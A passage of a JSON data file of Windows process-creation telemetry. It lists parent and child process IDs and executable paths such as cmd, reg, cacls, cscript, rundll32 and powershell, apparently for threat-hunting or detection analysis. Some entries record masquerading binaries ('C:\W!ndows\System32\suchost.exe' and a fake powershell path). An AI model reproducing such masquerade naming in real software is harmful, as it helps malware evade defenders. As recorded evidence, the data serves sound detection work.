",\"0x1b64\",\"0x2080\",\"0x23ec\",\"0x10a8\",\"0x490\",\"0x203c\",\"0x21b0\",\"0xb00\",\"0x1d38\",\"0xfcc\",\"0x21c8\",\"0x94c\",\"0x7fc\",\"0x8f8\",\"0x1250\",\"0x1c84\",\"0x1d34\",\"0x1704\",\"0x21d4\",\"0x834\",\"0x1fd0\",\"0xcc8\",\"0xb48\",\"0x1834\",\"0x2164\",\"0x19c8\",\"0x2080\",\"0x1368\",\"0x1ed4\",\"0x2008\",\"0x1040\",\"0xd80\",\"0x19a8\",\"0x17d8\",\"0x21c8\",\"0x1be0\",\"0x108c\",\"0xccc\",\"0x17a4\",\"0x1984\",\"0x1ca4\",\"0x1a44\",\"0x7fc\",\"0x1b10\",\"0xe04\",\"0x12f8\",\"0x2170\",\"0x1bc0\",\"0xa24\",\"0x22a8\",\"0x394\",\"0x8f8\",\"0x1250\",\"0x2364\",\"0x9ec\",\"0x1260\",\"0xe08\",\"0x23d4\",\"0xb4\",\"0x1278\",\"0x53c\",\"0x974\",\"0x1720\",\"0x1fc0\",\"0x1af0\",\"0x1ea0\",\"0x1850\",\"0x11f0\",\"0x1928\",\"0x12f8\",\"0x1c20\",\"0x1d08\",\"0xed4\",\"0xe50\",\"0x684\",\"0xf58\",\"0x13e0\",\"0xcc0\",\"0x3c4\",\"0x1914\",\"0xc14\",\"0xe60\",\"0x1990\",\"0x1420\",\"0x1d90\",\"0x15c8\",\"0xfcc\",\"0x17a8\",\"0x212c\",\"0x8c4\",\"0x1c24\",\"0x1250\",\"0x1d9c\",\"0xc4c\",\"0x648\",\"0x12e0\",\"0xbe4\",\"0xc1c\",\"0x203c\",\"0x1e8c\",\"0xc80\",\"0x1080\",\"0x1e44\",\"0x1804\",\"0x1e30\",\"0xd74\",\"0x162c\",\"0xcec\",\"0x10d0\",\"0x1d54\",\"0x23d4\",\"0x12c4\",\"0x23d8\",\"0x1868\",\"0x594\",\"0x2080\",\"0x23e8\",\"0xc68\",\"0x67c\",\"0xcac\",\"0xf80\",\"0xd98\",\"0x6c0\",\"0x17d8\",\"0xdb0\",\"0x770\",\"0xfcc\",\"0x1714\",\"0xd60\",\"0x1588\",\"0xf08\",\"0x22a8\",\"0x594\",\"0x11cc\",\"0x850\",\"0x2384\",\"0xda4\",\"0x1e44\",\"0x1770\",\"0x12cc\",\"0xbd0\",\"0x67c\",\"0x1b50\",\"0xfd4\",\"0x16e0\",\"0x8c4\",\"0x1ac4\",\"0x2278\",\"0x154c\",\"0x12bc\",\"0x1734\",\"0x123c\",\"0x550\",\"0x1680\",\"0xc98\",\"0x16fc\",\"0x5ac\",\"0x1770\",\"0x21f4\",\"0xfe0\",\"0x17ac\",\"0x1e68\",\"0x53c\",\"0x107c\",\"0x1934\",\"0x11dc\",\"0xfbc\",\"0x2d0\",\"0x5c\",\"0x23a4\",\"0x11f0\",\"0xb00\",\"0xb48\",\"0x2068\",\"0x16e8\",\"0x212c\",\"0xe60\",\"0x1fe8\",\"0x107c\",\"0x9f0\",\"0x974\",\"0x2378\",\"0x1004\",\"0x848\",\"0x162c\",\"0x1ce4\",\"0x1be0\",\"0xd74\",\"0x1d44\",\"0x48c\",\"0x19f0\",\"0x5c4\",\"0x1db4\",\"0x12cc\",\"0x1df8\",\"0x1ff8\",\"0xd78\",\"0xdd0\",\"0x12f8\",\"0xf94\",\"0x1eb4\",\"0x58\",\"0x135c\",\"0x1b28\",\"0x1e60\",\"0xf90\",\"0x508\",\"0x21b0\",\"0x494\",\"0x378\",\"0x2168\",\"0x254\",\"0x2328\",\"0x1834\",\"0xcc0\",\"0x15f8\",\"0x1f7c\",\"0x2274\",\"0x22fc\",\"0x15c0\",\"0x19c8\",\"0x19e8\",\"0xf98\",\"0xbbc\",\"0xb70\",\"0x1590\",\"0x2298\",\"0xe58\",\"0x15e4\",\"0x1f00\",\"0x2384\",\"0xa24\",\"0x1070\",\"0x1df4\",\"0x2044\",\"0x1520\",\"0xedc\",\"0x1634\",\"0x1b28\",\"0xd7c\",\"0x182c\",\"0x2070\",\"0x1f2c\",\"0x6f8\",\"0x10c4\",\"0x1de4\",\"0x5ac\",\"0x864\",\"0x518\",\"0x1d44\",\"0x48c\",\"0xb10\",\"0x5c4\",\"0x23ec\",\"0xde4\",\"0x20e4\",\"0x838\",\"0x1914\",\"0x1860\",\"0x1f7c\",\"0x1454\",\"0x7c0\",\"0x1844\",\"0x900\",\"0x22c0\",\"0x1ef4\",\"0x11ec\",\"0x1d3c\",\"0x2010\",\"0x1fa4\",\"0x195c\",\"0x600\",\"0xc60\",\"0x1ce8\",\"0x13e0\",\"0x770\",\"0xb70\",\"0x1f84\",\"0xed8\",\"0x21b4\",\"0x1998\",\"0x2204\",\"0x21b0\",\"0x594\",\"0x17e0\",\"0x22b0\",\"0xa2c\",\"0x1a00\",\"0x3c4\",\"0x1de4\",\"0x2178\",\"0x980\",\"0x1fe0\",\"0x1fa4\",\"0x14ec\",\"0xcc8\",\"0xfcc\",\"0x1280\",\"0x6f8\",\"0x1a5c\",\"0x8bc\",\"0x13e4\",\"0x1f60\",\"0x10a4\",\"0x107c\",\"0x2130\",\"0x1338\",\"0xc68\",\"0x21d4\",\"0xa94\",\"0x8f0\",\"0x1c20\",\"0x10bc\",\"0x12cc\",\"0x13a8\",\"0xb48\",\"0x23d8\",\"0x1480\",\"0x15fc\",\"0x2298\",\"0x1a44\",\"0x21b4\",\"0x1928\",\"0xdd8\",\"0x1488\",\"0x1fa4\",\"0x850\",\"0x1898\",\"0x2120\",\"0x854\",\"0x91c\",\"0x22f4\",\"0xb64\",\"0x1a9c\",\"0x17d0\",\"0x17d8\",\"0xd14\",\"0x128c\",\"0xb04\",\"0x1c20\",\"0x1360\",\"0x19f0\",\"0x1db0\",\"0xb60\",\"0x125c\",\"0x1590\",\"0x11a8\",\"0x1914\",\"0x1058\",\"0x1518\",\"0x5a8\",\"0x53c\",\"0x1394\",\"0x838\",\"0x15a8\",\"0x1cdc\",\"0x1948\",\"0x634\",\"0x1e8c\",\"0x181c\",\"0x1b50\",\"0x1e68\",\"0x2348\",\"0x125c\",\"0x1374\",\"0xd58\",\"0x2230\",\"0x13c0\",\"0x4e0\",\"0x12e0\",\"0xe00\",\"0xbd0\",\"0xe58\",\"0x1850\",\"0x23ec\",\"0x16f4\",\"0x1b74\",\"0x12d0\",\"0x1610\",\"0x648\",\"0x23b8\",\"0xf54\",\"0x20b0\",\"0x1dec\",\"0x1bbc\",\"0xa24\",\"0x16bc\",\"0xf80\",\"0xf08\",\"0xe50\",\"0x490\",\"0xa58\",\"0x1b00\",\"0x23a4\",\"0x1d9c\",\"0x1398\",\"0xb28\",\"0x2164\",\"0x1198\",\"0xd04\",\"0xce0\",\"0x3b8\",\"0x1f60\",\"0xe08\",\"0x10ac\",\"0xb38\",\"0x1480\",\"0xe2c\",\"0x1860\",\"0x2048\",\"0x128c\",\"0xed8\",\"0x107c\",\"0x13f8\",\"0x1940\",\"0x212c\",\"0x1f88\",\"0xbd0\",\"0x438\",\"0xbd8\",\"0x115c\",\"0x203c\",\"0x21b0\",\"0x2328\",\"0x1b28\",\"0xfe0\",\"0x258\",\"0x770\",\"0x84c\",\"0x248\",\"0x2018\",\"0xd70\",\"0xccc\",\"0x1680\",\"0x1260\",\"0x23f8\",\"0x1bb4\",\"0xcfc\",\"0xdd8\",\"0x1408\",\"0x1ce8\",\"0x1d08\",\"0x1178\",\"0x1dd8\",\"0x10c4\",\"0x1a5c\",\"0x8f8\",\"0x2018\",\"0x17ec\",\"0x594\",\"0x1f88\",\"0x14d8\",\"0x1b28\",\"0xfc0\",\"0xfc8\",\"0x212c\",\"0x23a8\",\"0x1680\",\"0x23e8\",\"0x55c\",\"0xadc\",\"0x1398\",\"0x1750\",\"0x11f0\",\"0x5ac\",\"0xa90\",\"0xc4c\",\"0xb00\",\"0x154c\",\"0xeb0\",\"0x960\",\"0x158c\",\"0x1be0\",\"0x2dc\",\"0x221c\",\"0xc98\",\"0x248\",\"0x1878\",\"0x84c\",\"0x1898\",\"0x6c0\",\"0x125c\",\"0x1374\",\"0xf58\",\"0x67c\",\"0xefc\",\"0x13d8\",\"0x19e8\",\"0x7fc\",\"0x107c\",\"0x1ef4\",\"0x19f4\",\"0x2020\",\"0x918\",\"0xf20\",\"0x1008\",\"0x23ec\",\"0x2274\",\"0x1f88\",\"0x239c\",\"0x1770\",\"0xfc0\",\"0x7f8\",\"0x1860\",\"0x1dec\",\"0xb00\",\"0xeb0\",\"0x158c\",\"0x794\",\"0x458\",\"0x1b00\",\"0xb28\",\"0x634\",\"0x16a8\",\"0x1e68\",\"0xa98\",\"0x14c8\",\"0x6c0\",\"0x22c0\",\"0x2280\",\"0xccc\",\"0x67c\",\"0x878\",\"0x13d8\",\"0x1458\",\"0xa24\",\"0x1cd8\",\"0x1420\",\"0x8f8\",\"0xc5c\",\"0x1f88\",\"0x1cd8\",\"0x19d8\",\"0x1e3c\",\"0x1a9c\",\"0x1770\",\"0x1260\",\"0x55c\",\"0x115c\",\"0x2068\",\"0x11dc\",\"0x13e4\",\"0x1524\",\"0x17b0\",\"0x8c4\",\"0x2228\",\"0x1cf0\",\"0x1860\",\"0x1874\",\"0xa90\",\"0x11a8\",\"0x173c\",\"0x1910\",\"0x1db4\",\"0x438\",\"0x2018\",\"0x21c8\",\"0x2044\",\"0x2200\",\"0x1124\",\"0xd44\",\"0x1c24\",\"0x1198\",\"0x135c\",\"0xd04\",\"0x2364\",\"0x1110\",\"0x994\",\"0x2328\",\"0x6d4\",\"0x20e4\",\"0x1998\",\"0xf54\",\"0x5a8\",\"0x1db8\",\"0x1fa4\",\"0x604\",\"0x1f24\",\"0x518\",\"0x2170\",\"0x12a8\",\"0x200c\",\"0xf80\",\"0x1860\",\"0x1874\",\"0xccc\",\"0xd7c\",\"0x1634\",\"0x1748\",\"0x1898\",\"0x1eb4\",\"0x1468\",\"0x2200\",\"0x1e8c\",\"0x2348\",\"0x11f0\",\"0x1f20\",\"0x1480\"],\"NewProcessId_par\":[\"NaN\",\"0xb3c\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0xd74\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x2368\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x2080\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1be0\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1928\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0xb3c\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0xb3c\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xd60\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1770\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x53c\",\"0xb3c\",\"0xb3c\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x16e8\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x21b0\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x1f7c\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0xb3c\",\"0x1454\",\"0x1454\",\"0x1844\",\"0xb3c\",\"0xb3c\",\"0x1ef4\",\"0xb3c\",\"0x1d3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x594\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x23d8\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x634\",\"0xb3c\",\"0xb3c\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x12e0\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1f60\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0xfc8\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0xadc\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0xeb0\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x107c\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xc5c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0xd44\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1c24\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\",\"0x1770\"],\"NewProcessName\":[\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\W!ndows\\\\System32\\\\suchost.exe\",\"C:\\\\W!ndows\\\\System32\\\\powershell.exe\",\"C:\\\\W!ndows\\\\System32\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\Speech_OneCore\\\\Common\\\\SpeechModelDownload.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\W